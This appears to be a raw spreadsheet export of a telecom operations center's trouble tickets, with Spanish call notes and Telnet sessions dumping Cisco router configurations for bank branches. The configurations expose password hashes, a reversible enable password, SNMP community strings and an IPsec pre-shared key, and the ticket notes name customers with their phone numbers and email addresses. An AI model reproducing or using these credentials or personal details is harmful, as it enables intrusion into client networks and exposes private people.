    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=434 TTL=255 TIME=1 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=435 TTL=255 TIME=1 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=436 TTL=255 TIME=1 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=437 TTL=255 TIME=1 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=438 TTL=255 TIME=1 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=439 TTL=255 TIME=1 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=440 TTL=255 TIME=1 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=441 TTL=255 TIME=2 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=442 TTL=255 TIME=1 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=443 TTL=255 TIME=1 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=444 TTL=255 TIME=2 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=445 TTL=255 TIME=1 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=446 TTL=255 TIME=1 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=447 TTL=255 TIME=1 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=448 TTL=255 TIME=1 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=449 TTL=255 TIME=1 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=450 TTL=255 TIME=1 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=451 TTL=255 TIME=2 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=452 TTL=255 TIME=1 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=453 TTL=255 TIME=1 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=454 TTL=255 TIME=1 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=455 TTL=255 TIME=1 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=456 TTL=255 TIME=1 MS
    REPLY FROM 10.87.174.153: BYTES=56 SEQUENCE=457 TTL=255 TIME=1 MS
  --- 10.87.174.153 PING STATISTICS ---
    457 PACKET(S) TRANSMITTED
    343 PACKET(S) RECEIVED
    24.94% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
&lt;OBARGTBAN1T1D04A03EIM3&gt;TELNET VPN AGENCIASWAY 10.87.174.153
TRYING 10.87.174.153 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.87.174.153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NE7W0RK$
PASSWORD:
% LOGIN INVALID
USERNAME: GESTIONIP
PASSWORD:
CC_WAY_GT_CAHABON_172&gt;@T7AC43D
% BAD IP ADDRESS OR HOST NAME
% UNKNOWN COMMAND OR COMPUTER NAME, OR UNABLE TO FIND COMPUTER ADDRESS
CC_WAY_GT_CAHABON_172&gt;ENA
PASSWORD:
CC_WAY_GT_CAHABON_172#SHO ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.87.174.145           4   084F.0AC8.669F  ARPA   GIGABITETHERNET0/1
INTERNET  10.87.174.153           -   0027.E3D3.0F01  ARPA   GIGABITETHERNET0/1
INTERNET  192.168.159.1           -   0027.E3D3.0F00  ARPA   VLAN1
INTERNET  192.168.159.2           3   74BF.C045.A28F  ARPA   VLAN1
INTERNET  192.168.159.7           0   54E1.408A.4310  ARPA   VLAN1
INTERNET  192.168.159.9           4   F4B5.202C.CF9F  ARPA   VLAN1
INTERNET  192.168.159.10          0   D45D.6406.FCEB  ARPA   VLAN1
CC_WAY_GT_CAHABON_172#SHO IP INT BRIE
CC_WAY_GT_CAHABON_172#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WAY_GT_CAHABON_172 UPTIME IS 4 HOURS, 37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129L23T
6 GIGABIT ETHERNET INTERFACES
1 TERMINAL LINE
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
245744K BYTES OF USB FLASH USBFLASH0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#   PID                   SN
-------------------------------------------------
*1        CISCO1921/K9          FJC2129L23T
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
------------------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE                  TECHNOLOGY-PACKAGE
              CURRENT              TYPE           NEXT REBOOT
------------------------------------------------------------------------
IPBASE        IPBASEK9             PERMANENT      IPBASEK9
SECURITY      NONE                 NONE           NONE
DATA          NONE                 NONE           NONE
NTWKESS       NONE                 NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CC_WAY_GT_CAHABON_172# SHO RUN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 3187 BYTES
!
VERSION 15.4
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_WAY_GT_CAHABON_172
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$DTIR$3XUJPKFWBEF9DCJMX2D621
!
NO AAA NEW-MODEL
!
!
!
!
!
!
!
!
!
!
!
IP DHCP EXCLUDED-ADDRESS 192.168.159.1 192.168.159.5
!
IP DHCP POOL AG_WAY
 NETWORK 192.168.159.0 255.255.255.0
 DEFAULT-ROUTER 192.168.159.1
!
!
!
IP CEF
NO IPV6 CEF
MULTILINK BUNDLE-NAME AUTHENTICATED
!
CTS LOGGING VERBOSE
!
!
LICENSE UDI PID CISCO1921/K9 SN FJC2129L23T
!
!
USERNAME GESTIONIP SECRET 5 $1$YJLU$EAXDYKXLH.HE3PUQNYOXN1
!
REDUNDANCY
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.149.231 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/427100015T/_/
 BANDWIDTH 2048
 NO IP ADDRESS
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION WAN PRINCIPAL/_/427100173T/_/
 BANDWIDTH 2048
 IP ADDRESS 10.87.174.153 255.255.255.240
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE GIGABITETHERNET0/0/0
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET0/0/1
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET0/0/2
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET0/0/3
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
!
INTERFACE VLAN1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 192.168.159.1 255.255.255.0
 RATE-LIMIT INPUT 2048000 384000 768000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 2048000 384000 768000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 LOAD-INTERVAL 30
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
IP ROUTE 0.0.0.0 0.0.0.0 10.87.174.145
!
LOGGING SOURCE-INTERFACE LOOPBACK5
!
!
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION BARRIO SAN PEDRO ZONA 0 ALTA VERAPAZ SANTA MARIA CAHABON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WAY_GT_CAHABON_172#         WR</t>
  </si>
  <si>
    <t>F4575534</t>
  </si>
  <si>
    <t>SE LLAMO A SELVIN QUIEN BRINDA CONTACTO DE YENIFER MARIN - 5480-7750  YA QUE ESTA PERSONA SI ESTA EN LA FISCALIA REPORTADA.-- SIN EMBARGO YENIFER NO RESPONDE LLAMADA--</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE   YENIFER MARIN -  5480-7750 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO **
ID 1001870267
**</t>
  </si>
  <si>
    <t>EN SEGUIMIENTO A CRONOLOGÍA DE LA GESTIÓN ANTERIOR SE LLAMA A LESTER  AL 54176229 ID 1001885634 INGRESA A BUZÓN Y SE PROCEDE A LLAMAR A MIRIAM AL 53593163 ID 1001886199 INGRESA LA LLAMADA Y COMENTA QUE SI ESTA EN EL PR POR LO QUE SE CONTACTA CON EL GESTOR YENSI.CALGUA AL 8126 ID 1001886599 ATIENDE JOSE.OCHOA Y VA A TRANSFERIR CON YENSI PERO SE VALIDA QUE INGRESA CON DARWIN ESPAÑA LO VALIDA Y COMENTA QUE SE TRANSFIERA Y SE DEJA CON EL PR EN LINEA.</t>
  </si>
  <si>
    <t>F4575541</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GABRIELA CASTILLO 49616490 MENCIONA QUE PERSISTE EL INCONVENIENTE
SE LE INDICA QUE A NIVEL DE CLARO TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001821008</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KAREN ALVARADO 46719846 MENCIONA QUE REPORTO 11 TICKETS Y LA CENTRAL DEBIDO A QUE NO TIENE RESPUESTA DE NINGUNA SUCURSAL
SE LE INFORMA QUE A NIVEL DE CLARO TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001824337</t>
  </si>
  <si>
    <t>F4575543</t>
  </si>
  <si>
    <t xml:space="preserve">
SERGIO DE MONITOREO DE BANCO AZTECA, CONFIRMA FALLA DE ENERGIA EN SITIO</t>
  </si>
  <si>
    <t>F4575545</t>
  </si>
  <si>
    <t>SE  ENVIA  CORREO A CLIENTE  SOLICITANDO ACCESOS
GESTION DE ACCESOS F4575545| 8900658T|BANCO DE DESARROLLO RURAL, S.A. | 1 AVENIDA 2-05 ZONA 1 SAN JOSE EL GOLFO EDIF. MUNICIPAL
J
JONATHAN EDUARDO TEZEN MEJIA
PARA:TIC GONZÁLEZ, ANIBAL &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;;TIC-TELECOM@BANRURAL.COM.GT
CC:CNOCCA;GRUPO N1
MAR 24/05/2022 9:54
BUENA DÍA ESTIMADO CLIENTE
     SOLICITANDO DE SU AMABLE APOYO CON PODER GESTIONAR ACCESOS A NUESTRA ÁREA TÉCNICA PARA  VALIDAR SERVICIO EN :  F4575545|  8900658T|BANCO DE DESARROLLO RURAL, S.A.  |
1 AVENIDA 2-05 ZONA 1 SAN JOSE EL GOLFO EDIF. MUNICIPAL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AGRADECEMOS   BRINDAR HORA Y FECHA PARA VALIDAR SERVICIO
EN ESPERA DE SUS COMENTARIOS QUEDO ATENTO.,</t>
  </si>
  <si>
    <t>F4575553</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE KAREN ALVARADO AL 46719846 SE CONTACTA A CLIENTE Y SE DEJA EN CONFERENCIA CON GESTOR**
ID 1001828761
**</t>
  </si>
  <si>
    <t>F4575554</t>
  </si>
  <si>
    <t>SE VEN CONEXIONES CORRECTS POR PARTE DE CLIENTE  SE VIO UNA DESCONEXION DE ENERGIA EN EL CISCO , SE VALIDAN DEMAS CABLEADOS Y TODO SE VE EN ORDEN, DEL ROUTER CLARO VA A UN FORTINET EL CUAL PUEDE SER EL INCIDENTE</t>
  </si>
  <si>
    <t>**SE LLAMA A CL FRANCISCO SALINAS  AL 25912142 CONTESTA UN SEÑOR INDICA QUE ES NUMERO EQUIVOCADO SE PREGUNTA POR EL SEÑOR MEDARDO LAINEZ PERO INSISTE QUE ES NUMERO EQUIVOCADO  Y CORTA LLAMADA **
ID 1001832457
**</t>
  </si>
  <si>
    <t>F4575555</t>
  </si>
  <si>
    <t>FALLA GENERAL F4575388/FALLA MASIVA F4575691:
CAÍDA TOTAL || ATN 905-F CELDA LAS VEGAS
CORTE DE FO ENTRE CAMBOTE Y LAS SITIO CELDA LAS VEGAS HUEHUETENANGO
SEGUIMIENTO DE LA FALLA:
24/05/2022 12:38:57 GUATEMALA/CENTRO AMERICA (ENRIQUE RAFAEL CASTILLO GONZALEZ):
SE ESCALÓ CON HUBER GÓMEZ/FO REGIÓN 58260951 INDICA QUE HABÍA CORTE DE FO EN SECTOR POR ACCIDENTE DE TRÁNSITO, CAMIÓN PASÓ LLEVÁNDOSE POSTE QUE SOSTENÍA LA FO.
SE INSTALARON 150 METROS DE CABLE, LOS ENLACES YA DEBERÍAN DE ESTAR OPERATIVOS.
SE HICIERON 2 EMPALMES DE 24 HILOS.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSE ARGUETA AL 54877835 INDICA QUE AUN PERSISTE EL INCONVENIENTE QUE NO TIENE SISTEMA || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 1001833673
**</t>
  </si>
  <si>
    <t>F4575556</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 30246026 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001960127</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 30246026 MENCIONA QUE VALIDARA CON CLIENTE FINAL YA QUE ESTAN TENIENDO TIEMPOS MUY ALTOS
CLIENTE SOLICITA LLAMADA PARA LAS 15:00 HRS
-ID 1001905338</t>
  </si>
  <si>
    <t>F4575558</t>
  </si>
  <si>
    <t>F4575561</t>
  </si>
  <si>
    <t>SE LLAMA AL PR DELMI GARCIA AL 33948912 ID 1001890278 ATIENDE Y SE LE  BRINDA LA INFORMACIÓN EN SEGUIMIENTO DEL TICKET Y COMENTA QUE AUN PERSISTE Y NO TIENEN SISTEMAS POR LO QUE SE CONTACTA CON EL GESTOR  JURGEN.BOCH AL 8126 ID 1001891065  ATIENE LEONEL RODAS Y TRANSFIERE CON JURGEN Y ATIENDE Y SE LE BRINDA LA INFORMACIÓN Y COMENTA QUE ESTA OCUPADO CON 2 FALLAS Y QUE SE LE SOLICITE EL LAS IP DEL PR Y CENTRAL AUNQUE COMENTA QUE NO LO VE NECESARIO PORQUE EL SERVICIO SI ESTA ARRIBA ES INCIDENCIA DE LA RED LAN Y COMENTA QUE SE PROCEDE CON EL CIERRE Y EN CASO DE VALIDAR EL CIERRE CON EL TICKET CON EL CL SI VALIDARAN SUS PRUEBAS Y TODO ESTA BIEN QUE BRINDEN LAS IP PARA LA REAPERTURA DE REINCIDENCIA.  SE PROCEDE CON EL CIERRE DE LA FALLA COMO LO COMENTA JURGEN.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DELMI GARCIA AL 33948912 INDICA QUE PERSISTE EL INCONVENIENTE || SE NOTIFICA A GESTOR **
ID 1001837350
**</t>
  </si>
  <si>
    <t>F4575568</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CRISTIAN HERRERA 36894258 SOLICITA QUE SE LE LLAME MAÑANA A LAS 10:00 AM **
ID 2001208667
**</t>
  </si>
  <si>
    <t>F4575570</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. GUILLERMO 49283925 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001920546</t>
  </si>
  <si>
    <t>ACTUALMENTE EN LLAMADA CON CLIENTE SR. GUILLERMO AL 49283925 SE LE SOLICITA REALIZAR PRUEBAS CON UNA PC DIRECTAMENTE CONECTADA AL CPE DE CLARO, YA QUE AL TERNER VARIOS DISPOSITIVOS CONSUMEN ANCHO DE BANDA Y NO SE REFLEJA EL ANCHO DE BANDA REAL.</t>
  </si>
  <si>
    <t xml:space="preserve"> SR. GUILLERMO AL 49283925 SOLICITA REALIZAR LAS PRUEBAS PARA LA 1PM YA QUE ACTUALMENTE TUVO QUE ATENDER A CLIENTES Y NO SE PUDO DETENER EL PROCESO DE FACTURACION ID: 1001840066.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  GUILLERMO AL 49283925 INDICA QUE SOLO LE ESTA LLEGANDO A 9 MG  || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 1001840066
**</t>
  </si>
  <si>
    <t>F4575577</t>
  </si>
  <si>
    <t>REPORTA CAIDA TOTAL
SOLUCION SE APLICO REINICIO EN LOS EQUIPOS DE CLIENTE, SE VALIDA SERVICIO RESTABLECE CLIENTE REALIZO PRUEBAS E INDICA QUE FUNCIONA TODO OK.</t>
  </si>
  <si>
    <t>F4575579</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JORGE ALFARO 32731660 SERGIO MENCIONA QUE REALIZARON UNA LIMPIEZA Y LUEGO DE ELLO YA NO PRESENTARON CAIDAS
CLIENTE INDICA QUE EL EQUIPO AL QUE LLEGA LA FO ESTA REALIZANDO RUIDO
UBICACIÓN: ENTRADA DE COPAN, BARRIO EL TRIANGULO SALIDA FLORIDA COPAN PLAZA SAN PEDRO 2DA PLANTA, LA ENTRADA COPÁN
HORARIO DE ATENCION:8:00 - 16:00
-ID 1001962520</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SERGIO ALFARO AL 32731660 CLIENTE NO RESPONDE SE INTENTARA LUEGO**
ID 1001850871
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 32731660 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001975361</t>
  </si>
  <si>
    <t>USERNAME:
% USERNAME:  TIMEOUT EXPIRED!
USERNAME: CLARO
PASSWORD:
CSC891_HERMANDAD_LA_ENTRADA_COP_ENTTX_DX6M_ID619468&gt;ENA
PASSWORD:
CSC891_HERMANDAD_LA_ENTRADA_COP_ENTTX_DX6M_ID619468#SHO IP INT BRIE
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
ASYNC1                     UNASSIGNED      YES NVRAM  DOWN                  DOWN
FASTETHERNET0              UNASSIGNED      YES UNSET  DOWN                  DOWN
FASTETHERNET1              UNASSIGNED      YES UNSET  DOWN                  DOWN
FASTETHERNET2              UNASSIGNED      YES UNSET  UP                    UP
FASTETHERNET3              UNASSIGNED      YES UNSET  DOWN                  DOWN
FASTETHERNET4              UNASSIGNED      YES UNSET  DOWN                  DOWN
FASTETHERNET5              UNASSIGNED      YES UNSET  DOWN                  DOWN
FASTETHERNET6              UNASSIGNED      YES UNSET  DOWN                  DOWN
FASTETHERNET7              UNASSIGNED      YES UNSET  DOWN                  DOWN
FASTETHERNET8              172.16.100.17   YES NVRAM  UP                    UP
GIGABITETHERNET0           UNASSIGNED      YES NVRAM  UP                    UP
GIGABITETHERNET0.603       10.2.23.26      YES NVRAM  UP                    UP
GIGABITETHERNET0.2285      10.82.96.233    YES NVRAM  UP                    UP
LOOPBACK5                  10.99.143.9     YES NVRAM  UP                    UP
TUNNEL105                  172.17.200.17   YES NVRAM  UP                    UP
TUNNEL501                  172.17.201.17   YES NVRAM  UP                    UP
VLAN1                      192.168.105.20  YES NVRAM  UP                    UP
CSC891_HERMANDAD_LA_ENTRADA_COP_ENTTX_DX6M_ID619468#SHO ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.2.23.25              1   084F.0AC8.65C0  ARPA   GIGABITETHERNET0.603
INTERNET  10.2.23.26              -   2C54.2DB6.0053  ARPA   GIGABITETHERNET0.603
INTERNET  10.82.96.225            0   0000.5E00.0105  ARPA   GIGABITETHERNET0.2285
INTERNET  10.82.96.233            -   2C54.2DB6.0053  ARPA   GIGABITETHERNET0.2285
INTERNET  10.82.96.253            0   084F.0AC8.65C0  ARPA   GIGABITETHERNET0.2285
INTERNET  172.16.100.17           -   2C54.2DB6.0043  ARPA   FASTETHERNET8
INTERNET  172.16.100.18          11   60D7.5558.78B9  ARPA   FASTETHERNET8
INTERNET  192.168.105.2           3   A4BB.6D49.866B  ARPA   VLAN1
INTERNET  192.168.105.3          14   8C04.BAA3.DC90  ARPA   VLAN1
INTERNET  192.168.105.4          39   A4BB.6D49.7AF5  ARPA   VLAN1
INTERNET  192.168.105.5          14   309C.23FA.FC17  ARPA   VLAN1
INTERNET  192.168.105.6          10   309C.23FA.F88F  ARPA   VLAN1
INTERNET  192.168.105.7           0   94C6.9179.295E  ARPA   VLAN1
INTERNET  192.168.105.8          63   309C.23FA.FBCD  ARPA   VLAN1
INTERNET  192.168.105.15          1   3CEF.8C36.F9E8  ARPA   VLAN1
INTERNET  192.168.105.20          -   2C54.2DB6.003B  ARPA   VLAN1
INTERNET  192.168.105.25         57   60C7.988B.5693  ARPA   VLAN1
INTERNET  192.168.105.26         46   60C7.98AF.06F2  ARPA   VLAN1
INTERNET  192.168.105.101         0   C074.AD63.FFA0  ARPA   VLAN1
INTERNET  192.168.105.102         0   C074.AD63.FFB3  ARPA   VLAN1
INTERNET  192.168.105.103         0   C074.AD64.05DF  ARPA   VLAN1
INTERNET  192.168.105.150         0   INCOMPLETE      ARPA
INTERNET  192.168.105.160        13   5838.7918.AB7A  ARPA   VLAN1
INTERNET  192.168.105.200         3   E8DE.27B8.7944  ARPA   VLAN1
CSC891_HERMANDAD_LA_ENTRADA_COP_ENTTX_DX6M_ID619468#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1                   0     0    0     0     0    0     0    0    0
  FASTETHERNET0            0     0    0     0     0    0     0    0    0
  FASTETHERNET1            0     0    0     0     0    0     0    0    0
* FASTETHERNET2            0     0    0     0 32000   38 48000   33    0
  FASTETHERNET3            0     0    0     0     0    0     0    0    0
  FASTETHERNET4            0     0    0     0     0    0     0    0    0
  FASTETHERNET5            0     0    0     0     0    0     0    0    0
  FASTETHERNET6            0     0    0     0     0    0     0    0    0
  FASTETHERNET7            0     0    0     0     0    0     0    0    0
* FASTETHERNET8            0   303    0     0     0    0     0    0  163
* GIGABITETHERNET0         0   883    0     0 59000   41 67000   47  515
* GIGABITETHERNET0.603     -     -    -     -     -    -     -    -   -
* GIGABITETHERNET0.2285    -     -    -     -     -    -     -    -   -
* LOOPBACK5                0     0    0     0     0    0     0    0    0
* TUNNEL105                0     1    0   470 32000   36 36000   43    0
* TUNNEL501                0     0    0   131     0    0     0    0    0
* VLAN1                    0     0    0     0 30000   40 26000   33  391
NOTE:NO SEPARATE COUNTERS ARE MAINTAINED FOR SUBINTERFACES
     HENCE DETAILS OF SUBINTERFACE ARE NOT SHOWN
CSC891_HERMANDAD_LA_ENTRADA_COP_ENTTX_DX6M_ID619468#SHO RUN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 5216 BYTES
!
! NO CONFIGURATION CHANGE SINCE LAST RESTART
!
VERSION 15.0
SERVICE TCP-KEEPALIVES-IN
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CSC891_HERMANDAD_LA_ENTRADA_COP_ENTTX_DX6M_ID619468
!
BOOT-START-MARKER
BOOT-END-MARKER
!
LOGGING BUFFERED 4096
ENABLE PASSWORD 7 00121615300858342605076F0515
!
NO AAA NEW-MODEL
!
!
!
CLOCK TIMEZONE UTC -6
!
!
NO IP SOURCE-ROUTE
!
!
!
!
NO IP CEF
NO IPV6 CEF
!
!
MULTILINK BUNDLE-NAME AUTHENTICATED
LICENSE UDI PID CISCO891-K9 SN FTX161781R2
!
!
USERNAME HERMANDAD PRIVILEGE 15 SECRET 5 $1$MOLA$WJL95FAKONUP3Z/U6IQGH/
USERNAME CLARO PRIVILEGE 0 SECRET 5 $1$TT5/$GOHKTI6VTTIJIL5OASYTL/
USERNAME SERCOM PRIVILEGE 15 SECRET 5 $1$MJJA$.H4UFEV.E77OLGBTL5D0C1
!
!
!
!
CRYPTO ISAKMP POLICY 10
 ENCR AES
 HASH MD5
 AUTHENTICATION PRE-SHARE
 GROUP 5
CRYPTO ISAKMP KEY HERMANDAD ADDRESS 0.0.0.0 0.0.0.0
!
!
CRYPTO IPSEC TRANSFORM-SET DMVPN-TSET ESP-AES ESP-SHA-HMAC
!
CRYPTO IPSEC PROFILE HERMANDADPROFILE
 SET TRANSFORM-SET DMVPN-TSET
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.99.143.9 255.255.255.255
 !
!
INTERFACE TUNNEL105
 DESCRIPTION === AGENCIA ENTRADA COPAN --- CLARO 6MBPS ===
 BANDWIDTH 4000
 IP ADDRESS 172.17.200.17 255.255.255.0
 NO IP REDIRECTS
 IP MTU 1400
 IP NHRP AUTHENTICATION NHRPPASS
 IP NHRP MAP MULTICAST 10.2.23.50
 IP NHRP MAP 172.17.200.254 10.2.23.50
 IP NHRP NETWORK-ID 1
 IP NHRP HOLDTIME 300
 IP NHRP NHS 172.17.200.254
 IP TCP ADJUST-MSS 1360
 LOAD-INTERVAL 30
 DELAY 1
 TUNNEL SOURCE 10.2.23.26
 TUNNEL MODE GRE MULTIPOINT
 TUNNEL KEY 150
 TUNNEL PROTECTION IPSEC PROFILE HERMANDADPROFILE
 !
!
INTERFACE TUNNEL501
 DESCRIPTION === AGENCIA ENTRADA COPAN --- TIGO 1MBPS ===
 BANDWIDTH 1000
 IP ADDRESS 172.17.201.17 255.255.255.0
 NO IP REDIRECTS
 IP MTU 1400
 IP NHRP AUTHENTICATION NHRPPASS
 IP NHRP MAP MULTICAST 172.4.38.254
 IP NHRP MAP 172.17.201.254 172.4.38.254
 IP NHRP NETWORK-ID 2
 IP NHRP HOLDTIME 300
 IP NHRP NHS 172.17.201.254
 IP TCP ADJUST-MSS 1360
 DELAY 6
 TUNNEL SOURCE 172.16.100.17
 TUNNEL MODE GRE MULTIPOINT
 TUNNEL KEY 150
 TUNNEL PROTECTION IPSEC PROFILE HERMANDADPROFILE
 !
!
INTERFACE FASTETHERNET0
 !
!
INTERFACE FASTETHERNET1
 !
!
INTERFACE FASTETHERNET2
 !
!
INTERFACE FASTETHERNET3
 !
!
INTERFACE FASTETHERNET4
 DESCRIPTION INTERCONEXION CLARO
 !
!
INTERFACE FASTETHERNET5
 !
!
INTERFACE FASTETHERNET6
 !
!
INTERFACE FASTETHERNET7
 DUPLEX FULL
 !
!
INTERFACE FASTETHERNET8
 DESCRIPTION === INTERCONEXION CLARO-TIGO ===
 IP ADDRESS 172.16.100.17 255.255.255.252
 DUPLEX AUTO
 SPEED AUTO
 !
!
INTERFACE GIGABITETHERNET0
 DESCRIPTION === WAN CLARO ===
 NO IP ADDRESS
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100
 !
!
INTERFACE GIGABITETHERNET0.603
 DESCRIPTION WAN_INTERFACE
 ENCAPSULATION DOT1Q 603
 IP ADDRESS 10.2.23.26 255.255.255.252
 NO CDP ENABLE
!
INTERFACE GIGABITETHERNET0.2285
 DESCRIPTION GESTION
 ENCAPSULATION DOT1Q 2285
 IP ADDRESS 10.82.96.233 255.255.255.224
 NO CDP ENABLE
!
INTERFACE VLAN1
 DESCRIPTION LAN
 IP ADDRESS 192.168.105.20 255.255.255.0
 IP FLOW INGRESS
 IP FLOW EGRESS
 RATE-LIMIT INPUT 12288000 2304000 4608000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 12288000 2304000 4608000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 IP TCP ADJUST-MSS 1452
 LOAD-INTERVAL 30
 !
!
INTERFACE ASYNC1
 NO IP ADDRESS
 ENCAPSULATION SLIP
 !
!
!
ROUTER EIGRP 100
 DISTRIBUTE-LIST PREFIX EIGRP IN
 NETWORK 172.17.200.0 0.0.0.255
 NETWORK 172.17.201.0 0.0.0.255
 NETWORK 192.168.105.0
 DISTANCE 100 172.17.201.0 0.0.0.255
!
IP FORWARD-PROTOCOL ND
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
IP FLOW-TOP-TALKERS
 TOP 20
 SORT-BY BYTES
 CACHE-TIMEOUT 100
!
IP ROUTE 10.2.23.50 255.255.255.255 10.2.23.25 NAME HACIA_WAN_OFICICNA_PRINCIPAL
IP ROUTE 10.31.210.16 255.255.255.248 10.82.96.225 NAME SSGT
IP ROUTE 10.33.2.0 255.255.255.0 10.82.96.225 NAME GESTION_SOLAR
IP ROUTE 10.195.4.79 255.255.255.255 10.82.96.225 NAME GESTION_TGU
IP ROUTE 10.195.14.47 255.255.255.255 10.82.96.225 NAME GESTION_SPS
IP ROUTE 172.4.38.254 255.255.255.255 172.16.100.18 200 NAME INTWAN_OFICPPAL_ENLACETIGO
IP ROUTE 186.151.244.176 255.255.255.240 10.2.23.25 NAME MONITOREO_CNOC
!
!
IP PREFIX-LIST EIGRP SEQ 5 PERMIT 0.0.0.0/0
LOGGING SOURCE-INTERFACE LOOPBACK5
NO CDP RUN
!
!
!
!
SNMP-SERVER COMMUNITY G3$T10NH0NDUR@$ RO
SNMP-SERVER COMMUNITY MON000089D RO
SNMP-SERVER COMMUNITY G3$T10NH0DUR@$ RO
SNMP-SERVER TRAP-SOURCE LOOPBACK5
!
!
CONTROL-PLANE
 !
!
PRIVILEGE EXEC ALL LEVEL 2 SHOW
BANNER MOTD ^CCCC
+----------------------------------------------------------------+
|
| ESTE EQUIPO ES PROPIEDAD PRIVADA,
